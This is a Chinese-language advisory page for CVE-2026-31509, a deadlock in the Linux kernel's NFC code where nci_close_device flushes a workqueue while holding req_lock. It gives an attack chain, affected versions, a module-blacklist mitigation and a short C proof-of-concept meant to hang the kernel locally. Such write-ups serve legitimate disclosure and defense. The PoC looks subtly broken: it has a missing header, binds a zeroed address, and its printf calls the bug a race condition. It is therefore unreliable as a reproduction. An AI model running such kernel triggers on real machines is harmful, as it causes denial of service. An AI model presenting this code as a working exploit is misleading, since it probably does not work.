CVE-2026-31509 CVSS 5.5 中危

CVE-2026-31509 Linux内核NFC子系统死锁漏洞

披露日期: 2026-04-22

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31509

漏洞类型

死锁

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核NFC子系统中存在循环锁依赖漏洞。在nci_close_device函数中，代码在持有req_lock锁的情况下刷新工作队列，导致处理函数无法获取同一把锁，从而引发死锁，造成拒绝服务。

技术细节

该漏洞存在于Linux内核的net/nfc/nci/core.c文件中。问题核心在于nci_close_device()函数在执行时，持有互斥锁req_lock的同时，调用了flush_workqueue()来清空rx_wq和tx_wq。然而，rx_wq上的工作项（如nci_rx_work）在执行过程中，会通过调用链nci_rx_work -> nci_rx_data_packet -> nci_data_exchange_complete -> __sk_destruct -> rawsock_destruct -> nfc_deactivate_target -> nci_request尝试再次获取req_lock。由于该锁已被主线程持有且未释放，工作队列线程将永久阻塞，导致nci_close_device也无法完成（因为它在等待workqueue清空），形成典型的死锁场景。本地攻击者可利用此逻辑缺陷使系统挂起。

攻击链分析

STEP 1

步骤1

本地低权限用户创建并绑定NFC原始套接字。

STEP 2

步骤2

向套接字发送数据，触发NFC内核子系统的接收工作队列rx_wq任务。

STEP 3

步骤3

用户关闭套接字或触发设备关闭流程，调用nci_close_device。

STEP 4

步骤4

nci_close_device持有req_lock并尝试刷新rx_wq，但rx_wq任务也在等待req_lock，导致死锁。

STEP 5

步骤5

系统内核线程挂起，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31509: Linux Kernel NFC Deadlock
 * This code attempts to trigger the deadlock by interacting with NFC sockets.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/nfc.h>

int main() {
    int sock;
    struct sockaddr_nfc addr;

    // Create a raw NFC socket
    sock = socket(AF_NFC, SOCK_RAW, NFC_SOCKPROTO_RAW);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sa_family = AF_NFC;

    // Bind to NFC device to trigger initialization
    if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind");
        close(sock);
        return 1;
    }

    printf("Triggering race condition in NFC layer...\n");

    // Send data to populate rx_wq
    char dummy_data[10] = {0};
    send(sock, dummy_data, sizeof(dummy_data), 0);

    // Close device to trigger nci_close_device holding lock
    close(sock);

    return 0;
}

影响范围

Linux Kernel < 6.1.83

Linux Kernel < 6.6.23

Linux Kernel < 6.7.11

Linux Kernel < 6.8.2

防御指南

临时缓解措施

如果系统不使用NFC功能，建议禁用内核NFC模块或通过blacklist机制阻止模块加载，以规避潜在风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表